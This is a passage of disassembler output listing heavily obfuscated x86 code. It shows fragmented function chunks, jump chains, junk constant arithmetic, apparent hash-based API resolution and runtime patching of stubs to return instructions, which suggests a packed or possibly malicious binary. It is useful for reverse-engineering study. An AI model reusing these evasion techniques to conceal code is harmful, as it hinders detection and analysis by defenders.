sub_43B9B1 proc near ; CODE XREF: sub_44DB48-DDA7p
; ut7h7i2x:00443A9Dj
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00440E0C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441718 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447526 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004488A3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004539BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453AAC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454070 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454081 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004565C8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045964E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AA3C SIZE 00000006 BYTES
xchg eax, [esp+0]
pop eax
mov edx, 0CE3062ECh
call sub_44ED9F
push eax
ror eax, 7
jmp loc_4565C8
sub_43B9B1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43B9C8 proc near ; DATA XREF: ut7h7i2x:004581AEo
; FUNCTION CHUNK AT 0044A07E SIZE 00000005 BYTES
push 9C3554CEh
pop esi
rol esi, 1
push offset loc_43CF83
jmp loc_44A07E
sub_43B9C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_43B9DA: ; CODE XREF: sub_45854D:loc_450762j
; ut7h7i2x:00451601j ...
push eax
lea eax, dword_43AEC4
push eax
push eax
push offset loc_45A2D1
jmp loc_446611
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
sub esi, 51E05A72h
jmp loc_44458A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43B9F8: ; CODE XREF: sub_450FDE-506Dj
jnz loc_4418C9
jmp loc_459B4D
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_43BA03: ; CODE XREF: ut7h7i2x:loc_44DE3Aj
; sub_4462B0:loc_4595CEj ...
sub eax, 0DF7644E3h
push ecx
push 880EED9Eh
pop ecx
jmp loc_4471F5
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_43BA15: ; CODE XREF: ut7h7i2x:00452BCCj
push edi
jmp loc_45325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_43BA1B: ; CODE XREF: sub_4503C3:loc_43A447j
; sub_4503C3-15788j
call sub_453D8B
mov edx, 0C231F698h
push ebx
push 0C32C0C4Eh
pop ebx
add ebx, 8911199Eh
jmp loc_443EDD
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CDC
loc_43BA37: ; CODE XREF: sub_448CDC+B680j
and ecx, ebx
xor ebp, 315C35D2h
jmp loc_43FEAB
; END OF FUNCTION CHUNK FOR sub_448CDC
; ---------------------------------------------------------------------------
mov eax, 0D3717525h
jmp sub_4589E0
; ---------------------------------------------------------------------------
loc_43BA4E: ; DATA XREF: sub_459D1Co
mov eax, 8Dh
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_43BA54: ; CODE XREF: sub_446CA0+1ECEj
jmp loc_453A65
; END OF FUNCTION CHUNK FOR sub_446CA0
; =============== S U B R O U T I N E =======================================
sub_43BA59 proc near ; CODE XREF: sub_439FD5:loc_439FE2p
; sub_43CAF4:loc_43A749p ...
jnb sub_43B1E6
push ebp
call sub_4490B0
loc_43BA65: ; CODE XREF: sub_457F14+12j
jmp nullsub_27
sub_43BA59 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B50D
loc_43BA6A: ; CODE XREF: sub_44B50D+7j
jmp nullsub_14
; END OF FUNCTION CHUNK FOR sub_44B50D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D79C
loc_43BA6F: ; CODE XREF: sub_44D79C-E06Bj
jmp loc_450AB1
; END OF FUNCTION CHUNK FOR sub_44D79C
; =============== S U B R O U T I N E =======================================
sub_43BA74 proc near ; CODE XREF: ut7h7i2x:0043F598j
; sub_449700:loc_4474FBp
xchg edx, [esp+0]
pop edx
call dword ptr [ebp-4]
loc_43BA7B: ; CODE XREF: ut7h7i2x:00450AFAj
mov esp, ebp
pop ebp
retn
sub_43BA74 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459019
loc_43BA7F: ; CODE XREF: sub_459019-12E1Ej
jmp nullsub_2
; END OF FUNCTION CHUNK FOR sub_459019
; ---------------------------------------------------------------------------
loc_43BA84: ; CODE XREF: ut7h7i2x:00441BB9j
jmp loc_4404A6
; ---------------------------------------------------------------------------
loc_43BA89: ; CODE XREF: ut7h7i2x:00439496j
jmp locret_4502D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459BF0
loc_43BA8E: ; CODE XREF: sub_459BF0+12j
push offset sub_43FFB1
jmp loc_45829F
; END OF FUNCTION CHUNK FOR sub_459BF0
; ---------------------------------------------------------------------------
locret_43BA98: ; CODE XREF: ut7h7i2x:loc_4458BCj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_43BA99: ; CODE XREF: sub_44CAB9+11j
jmp loc_440283
; END OF FUNCTION CHUNK FOR sub_44CAB9
; =============== S U B R O U T I N E =======================================
sub_43BA9E proc near ; CODE XREF: sub_44445F:loc_441309p
; ut7h7i2x:004433E5j
; FUNCTION CHUNK AT 00439589 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043D60F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043FCA6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044037D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004406C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440EDD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004417C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A3B1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AF82 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044C6AA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451238 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452E33 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453853 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004599FA SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
mov [ebp-4], edx
cmp dword ptr [ebp-8], 0
jbe loc_440EDD
jmp loc_451238
sub_43BA9E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441AED
loc_43BAB4: ; CODE XREF: sub_441AED+1911j
shr eax, 6
cmp ebx, 0E980C83Eh
jmp loc_4391F3
; END OF FUNCTION CHUNK FOR sub_441AED
; ---------------------------------------------------------------------------
jnz loc_43F8ED
jmp loc_44715A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43BACD: ; CODE XREF: sub_43A556:loc_459289j
push eax
; END OF FUNCTION CHUNK FOR sub_43A556
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_43BACE: ; CODE XREF: sub_439BD1:loc_45707Aj
mov eax, edx
xchg eax, [esp+4+var_4]
push eax
pop edx
jmp loc_44EE38
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459B58
loc_43BADA: ; CODE XREF: sub_459B58:loc_43FD95j
; ut7h7i2x:00448088j ...
xchg eax, [esp+0]
push offset loc_43EC33
jmp loc_43FA3C
; END OF FUNCTION CHUNK FOR sub_459B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45114D
loc_43BAE7: ; CODE XREF: sub_45114D-84F6j
mov [ebp+0], edi
loc_43BAEA: ; CODE XREF: sub_45114D:loc_449841j
push 0
push 0
call sub_440B8A
loc_43BAF3: ; CODE XREF: ut7h7i2x:00454586j
jmp nullsub_139
; END OF FUNCTION CHUNK FOR sub_45114D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A83C
loc_43BAF8: ; CODE XREF: sub_45A83C-14ACAj
push esi
push 67FF01CCh
pop esi
and esi, 0AEBAAADAh
jnz loc_457955
; END OF FUNCTION CHUNK FOR sub_45A83C
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_43BB0B: ; CODE XREF: sub_4433C5-4959j
jmp loc_43FCFC
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
loc_43BB10: ; CODE XREF: ut7h7i2x:0043966Dj
; ut7h7i2x:00454FFEj
jmp locret_4423D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_43BB15: ; CODE XREF: sub_4462B0:loc_44CB69j
jz loc_43C8A3
jmp loc_453D4A
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_43BB20: ; DATA XREF: sub_44D43D-A950o
push 8F58EAh
pop edi
rol edi, 12h
or edi, 0C9098610h
cmp edi, 1B521CDh
jmp loc_45A7C8
; ---------------------------------------------------------------------------
loc_43BB3A: ; CODE XREF: ut7h7i2x:0043D88Dj
jnb loc_45169E
adc esi, edi
; START OF FUNCTION CHUNK FOR sub_45967C
loc_43BB42: ; CODE XREF: sub_45967C-6D73j
add esi, 1525A3AFh
popf
xor eax, esi
pop esi
call sub_439170
loc_43BB51: ; CODE XREF: sub_455127+Cj
jmp loc_454B9A
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
loc_43BB56: ; CODE XREF: ut7h7i2x:00453252j
jmp loc_4485FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_43BB5B: ; CODE XREF: sub_452B14-9E3Fj
; sub_452B14:loc_456F12j
mov eax, 63h
call sub_4448AF
jmp loc_44ACBE
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
jmp loc_43CEE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_43BB6F: ; CODE XREF: sub_43CE34:loc_44C8BBj
test eax, 2
jz loc_43CEE8
jmp loc_4580D5
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
loc_43BB7F: ; CODE XREF: ut7h7i2x:00448170j
sub ebp, 0ECC869A1h
; =============== S U B R O U T I N E =======================================
sub_43BB85 proc near ; CODE XREF: sub_439AE7:loc_44AF3Bp
; FUNCTION CHUNK AT 0043CE12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459F7E SIZE 0000000F BYTES
xchg ebx, [esp+0]
pop ebx
rol eax, 0Bh
push edi
jmp loc_43CE12
sub_43BB85 endp
; =============== S U B R O U T I N E =======================================
sub_43BB92 proc near ; DATA XREF: ut7h7i2x:loc_43E8B5o
push 2739F248h
pop edx
sub edx, 5D346DF7h
call sub_453621
sub_43BB92 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_43BBA3: ; CODE XREF: sub_44BF76-D4FFj
jmp loc_440339
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDA4
loc_43BBA8: ; CODE XREF: sub_43EDA4+Bj
mov ebp, eax
pop eax
push 65727DFAh
pop eax
loc_43BBB1: ; CODE XREF: ut7h7i2x:0045A4E0j
rol eax, 1Dh
test eax, 8000000h
jmp loc_44286D
; END OF FUNCTION CHUNK FOR sub_43EDA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43BBBF: ; CODE XREF: sub_439BF8:loc_439C0Ej
jz loc_439AB4
loc_43BBC5: ; CODE XREF: sub_444029+B65Bj
jmp loc_445281
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_43BBCA: ; CODE XREF: sub_44DF79+14j
jmp loc_44BDDF
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454A2B
loc_43BBCF: ; CODE XREF: sub_454A2B-C311j
jmp loc_43FC86
; END OF FUNCTION CHUNK FOR sub_454A2B
; ---------------------------------------------------------------------------
xchg esi, ebx
test edx, 792ADFF2h
jmp loc_43900A
; ---------------------------------------------------------------------------
locret_43BBE1: ; CODE XREF: ut7h7i2x:00459131j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_43BBE2: ; CODE XREF: sub_44CE09:loc_43BD09j
rol eax, 19h
add eax, 88838B90h
xchg eax, [esp+8+var_8]
jmp sub_4439B0
; END OF FUNCTION CHUNK FOR sub_44CE09
; =============== S U B R O U T I N E =======================================
sub_43BBF3 proc near ; DATA XREF: sub_43E592:loc_43CAAFo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043D66E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FF3D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A94A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450691 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004559AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570D4 SIZE 0000000E BYTES
xchg edi, [esp+0]
push edx
push 1068C3CEh
pop edx
xor edx, 0ABD046BAh
cmp edx, 3450D7A1h
jmp loc_44A94A
sub_43BBF3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_43BC0E: ; CODE XREF: sub_453E14-356Ej
jl loc_456D4A
jmp loc_4406EC
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
loc_43BC19: ; CODE XREF: ut7h7i2x:0043BDBEj
mov [eax], ebx
; =============== S U B R O U T I N E =======================================
sub_43BC1B proc near ; CODE XREF: ut7h7i2x:004446FCp
; FUNCTION CHUNK AT 0044D66F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A8FD SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
call sub_43AA94
jmp loc_44D66F
sub_43BC1B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43BC29: ; CODE XREF: sub_439BF8+652Dj
; ut7h7i2x:00450B59j
add edx, 89D305Bh
add edx, ebp
add edx, 1FF2F1E6h
mov [edx], eax
pop edx
mov eax, [ebp-10h]
push eax
jmp loc_4421EA
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_43BC43: ; CODE XREF: ut7h7i2x:00440F6Cj
or eax, ecx
rol ebx, 1Dh
sub ebp, eax
loc_43BC4A: ; CODE XREF: ut7h7i2x:loc_44B553j
lea edx, [ebp-14h]
push 0E08EFF79h
xchg edi, [esp]
jmp loc_44A079
; ---------------------------------------------------------------------------
loc_43BC5A: ; DATA XREF: sub_4420DC+4o
push 4C52DB7Ch
pop esi
rol esi, 1Eh
jb loc_4458FE
loc_43BC69: ; DATA XREF: ut7h7i2x:0043A316o
push 2857B8FDh
pop esi
xor esi, 6A22F0D1h
jnz loc_453FC3
loc_43BC7B: ; CODE XREF: ut7h7i2x:0045723Dj
jmp sub_441DBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524E2
loc_43BC80: ; CODE XREF: sub_4524E2+17j
jmp loc_44C76C
; END OF FUNCTION CHUNK FOR sub_4524E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43BC85: ; CODE XREF: sub_43FF65+249Ej
jmp loc_455151
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
xchg edx, [ecx]
jmp loc_4442BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464FE
loc_43BC91: ; CODE XREF: sub_4464FE+10j
jz loc_44EF23
loc_43BC97: ; CODE XREF: ut7h7i2x:0044E6DBj
jmp nullsub_472
; END OF FUNCTION CHUNK FOR sub_4464FE
; ---------------------------------------------------------------------------
loc_43BC9C: ; CODE XREF: ut7h7i2x:0044390Cj
jmp loc_43A8A8
; ---------------------------------------------------------------------------
cmp ecx, ebp
jmp loc_449117
; ---------------------------------------------------------------------------
mov eax, 0B9726E5Ah
call sub_43AA94
push edi
push 0D9F7C28Dh
pop edi
add edi, 8764B1BBh
or edi, 36FBAED2h
jmp loc_440ACF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_43BCCA: ; CODE XREF: sub_43CAF4-1418j
pop edx
push 5F6C76BAh
js loc_43BFA9
pop edx
jmp loc_44BD31
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
loc_43BCDC: ; CODE XREF: ut7h7i2x:loc_4541ADj
jz loc_450B71
sub edi, 2CFE4675h
cdq
pushf
jmp loc_450B71
; ---------------------------------------------------------------------------
jmp ds:off_41D0B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C6B4
loc_43BCF5: ; CODE XREF: sub_44C6B4+CC93j
jmp sub_44CB82
; END OF FUNCTION CHUNK FOR sub_44C6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_43BCFA: ; CODE XREF: sub_4448D7+14043j
jmp loc_4578A1
; END OF FUNCTION CHUNK FOR sub_4448D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_43BCFF: ; CODE XREF: sub_454B2B+38D8j
jmp loc_44370A
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
loc_43BD04: ; CODE XREF: ut7h7i2x:00455E6Fj
jmp loc_455833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_43BD09: ; CODE XREF: sub_44CE09-E77j
jmp loc_43BBE2
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443816
loc_43BD0E: ; CODE XREF: sub_443816+566Fj
; sub_443816+5791j ...
jb loc_448E8A
xchg edi, [esp+0]
mov edx, edi
pop edi
mov eax, [esp-4+arg_0]
push ebx
jmp loc_45355E
; END OF FUNCTION CHUNK FOR sub_443816
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_43BD23: ; CODE XREF: sub_439BD1+628Fj
push eax
push 4B1C86h
push 0B8AE0608h
pop eax
sub eax, ds:4000F1h
jmp loc_44B01A
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_43BD3A: ; DATA XREF: sub_452950:loc_458732o
call sub_43AA94
mov ds:dword_41D170, eax
lea eax, nullsub_514
mov byte ptr [eax], 0C3h
jmp loc_4452F0
; ---------------------------------------------------------------------------
locret_43BD53: ; CODE XREF: ut7h7i2x:0043FB16j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447DDB
loc_43BD54: ; CODE XREF: sub_447DDB+Dj
jmp loc_44FDE0
; END OF FUNCTION CHUNK FOR sub_447DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43BD59: ; CODE XREF: sub_43AA94:loc_43EEC7j
push offset loc_456E06
jmp loc_43B1A1
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_43BD63: ; CODE XREF: sub_44BDF1:loc_45786Cj
test eax, 80000h
jmp loc_448747
; END OF FUNCTION CHUNK FOR sub_44BDF1
; ---------------------------------------------------------------------------
mov eax, 83ED7AACh
call sub_43AA94
mov ds:dword_41D0DC, eax
lea eax, nullsub_229
mov byte ptr [eax], 0C3h
jmp loc_43AA82
; ---------------------------------------------------------------------------
loc_43BD8C: ; CODE XREF: ut7h7i2x:00448A07j
mov eax, [esp]
call sub_4450AC
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_43BD94: ; CODE XREF: sub_4433C5+10AF0j
popf
loc_43BD95: ; CODE XREF: sub_4433C5:loc_44D0DAj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_4445D4
jmp loc_452072
; END OF FUNCTION CHUNK FOR sub_4433C5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4551D3
loc_43BDA8: ; CODE XREF: sub_4551D3-BC96j
jmp loc_444D7F
; END OF FUNCTION CHUNK FOR sub_4551D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4424D2
loc_43BDAD: ; CODE XREF: sub_4424D2+Fj
jmp loc_445081
; END OF FUNCTION CHUNK FOR sub_4424D2
; ---------------------------------------------------------------------------
locret_43BDB2: ; CODE XREF: ut7h7i2x:0043B048j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_43BDB3: ; CODE XREF: sub_44B68F+4F65j
jmp loc_44D297
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
loc_43BDB8: ; CODE XREF: ut7h7i2x:0043EC1Cj
jmp loc_445079
; ---------------------------------------------------------------------------
cdq
jmp loc_43BC19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_43BDC3: ; CODE XREF: sub_45A25C:loc_457A70j
jnz loc_45584F
loc_43BDC9: ; CODE XREF: sub_450FDE+283Fj
jmp loc_44C77D
; END OF FUNCTION CHUNK FOR sub_45A25C
; ---------------------------------------------------------------------------
rol eax, 14h
jmp loc_43F940
; =============== S U B R O U T I N E =======================================
sub_43BDD6 proc near ; CODE XREF: ut7h7i2x:00440CFBj
; sub_450645:loc_44F0C8p ...
; FUNCTION CHUNK AT 0044DED2 SIZE 0000000D BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
jmp loc_44DED2
sub_43BDD6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_43BDE5: ; CODE XREF: sub_43DD17:loc_44EB3Cj
jz loc_45A037
sub edi, 57DF83DDh
jmp loc_4425DC
; END OF FUNCTION CHUNK FOR sub_43DD17
; =============== S U B R O U T I N E =======================================
sub_43BDF6 proc near ; DATA XREF: sub_43A513+116CFo
push ebp
call sub_456C93
loc_43BDFC: ; CODE XREF: ut7h7i2x:004550EEj
jmp nullsub_28
sub_43BDF6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B58
loc_43BE01: ; CODE XREF: sub_439B58+15EBj
jmp loc_44F65B
; END OF FUNCTION CHUNK FOR sub_439B58
; ---------------------------------------------------------------------------
add edi, edx
; START OF FUNCTION CHUNK FOR sub_450472
loc_43BE08: ; CODE XREF: sub_450472-4A49j
jmp sub_44A2A0
; END OF FUNCTION CHUNK FOR sub_450472
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C87F
loc_43BE0D: ; CODE XREF: sub_44C87F-E2B1j
push 9CCF51A2h
pop eax
or eax, 37518555h
test eax, 8
jmp loc_44984C
; END OF FUNCTION CHUNK FOR sub_44C87F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_43BE24: ; CODE XREF: sub_448CBC:loc_44DF99j
mov eax, [eax]
or eax, eax
jnz loc_446CB6
jmp loc_4446E0
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_43BE33: ; CODE XREF: sub_44C8F3+61EAj
sub edx, ebp
mov ebx, ebp
mov ecx, 6492C62Eh
jmp loc_43EE8A
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_43BE41: ; CODE XREF: sub_43C0DA:loc_456858j
pop ecx
add eax, 0D7A3337Fh
xor eax, 0A80D7864h
and eax, 0ACBA7C28h
add eax, 0DFD90D7h
push offset sub_4581EF
jmp loc_44B2C0
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
loc_43BE64: ; DATA XREF: sub_444A08+11DF3o
pop edi
not edx
sub eax, ebx
adc edx, ebx
jmp loc_4596C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43BE70: ; CODE XREF: sub_457A66:loc_4517A6j
sbb eax, ebp
loc_43BE72: ; CODE XREF: ut7h7i2x:loc_459DA9j
cdq
push ecx
jmp loc_450845
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_43BE79: ; CODE XREF: sub_4462B0+62D5j
jnz sub_454C8C
adc edx, eax
jmp loc_43F4D8
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_43BE86: ; CODE XREF: ut7h7i2x:00453ABDj
add edx, 17EABAB9h
adc ebp, esi
mov ebp, 0DA36C187h
; =============== S U B R O U T I N E =======================================
sub_43BE93 proc near ; CODE XREF: sub_439FD5+1D956j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043D16F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443F8B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444DDA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447FE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448332 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044934A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D04A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044EC8D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454319 SIZE 00000005 BYTES
push ebp
ja loc_44D04A
jmp loc_448332
sub_43BE93 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jle loc_44CDF0
jmp sub_446F9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E3FD
loc_43BEAA: ; CODE XREF: sub_44E3FD:loc_43ADCFj
pop edi
add edi, 0C5609D4h
or edi, 12C5BA4Fh
xor edi, 0C7625775h
and edi, 0E07373CBh
add edi, 4042294Dh
jmp loc_43EE3D
; END OF FUNCTION CHUNK FOR sub_44E3FD
; =============== S U B R O U T I N E =======================================
sub_43BECE proc near ; CODE XREF: ut7h7i2x:0043A482j
; ut7h7i2x:00448879p
xchg edi, [esp+0]
pop edi
mov byte ptr [eax], 0C3h
jmp nullsub_538
sub_43BECE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43BEDA: ; CODE XREF: ut7h7i2x:004470F1j
mov eax, [esp]
push esi
mov esi, edx
jmp loc_4391C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_43BEE5: ; CODE XREF: sub_443C4A-95D7j
jz loc_44FD36
xor edx, esi
loc_43BEED: ; CODE XREF: sub_443C4A:loc_441A6Dj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_453DF8
jmp loc_4402D3
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_43BEFE: ; CODE XREF: sub_43AE1A:loc_43AE26j
jnz loc_43BFAE
jmp loc_44263D
; END OF FUNCTION CHUNK FOR sub_43AE1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_43BF09: ; CODE XREF: sub_44EB88:loc_43E3AAj
jl loc_45ADA2
adc esi, edi
mov esi, eax
jmp loc_45AD9D
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
loc_43BF18: ; DATA XREF: sub_43F7B6+1027Eo
mov al, [eax]
mov [ebp-9], al
mov al, [ebp-0Ah]
push offset loc_43B041
jmp loc_451407
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_43BF2A: ; CODE XREF: sub_45500F:loc_44F05Dj
jz loc_43BFBD
jmp loc_447859
; END OF FUNCTION CHUNK FOR sub_45500F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_43BF35: ; CODE XREF: sub_44941C+Bj
pop ebx
mov eax, ds:dword_446644
or eax, eax
jnz loc_458C37
jmp loc_43CE07
; END OF FUNCTION CHUNK FOR sub_44941C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F19A
loc_43BF49: ; CODE XREF: sub_43F19A+1B5E5j
pop edi
; END OF FUNCTION CHUNK FOR sub_43F19A
; START OF FUNCTION CHUNK FOR sub_4523CA
loc_43BF4A: ; CODE XREF: sub_4523CA-5335j
mov [ebp-14h], eax
push 0AF390375h
pop eax
rol eax, 12h
jmp loc_448D69
; END OF FUNCTION CHUNK FOR sub_4523CA
; ---------------------------------------------------------------------------
loc_43BF5B: ; CODE XREF: ut7h7i2x:00441153j
mov [ebp-4], eax
push 1Ch
lea eax, [ebp-34h]
push ebp
jmp loc_44FE3E
; ---------------------------------------------------------------------------
locret_43BF69: ; CODE XREF: ut7h7i2x:00450002j
retn
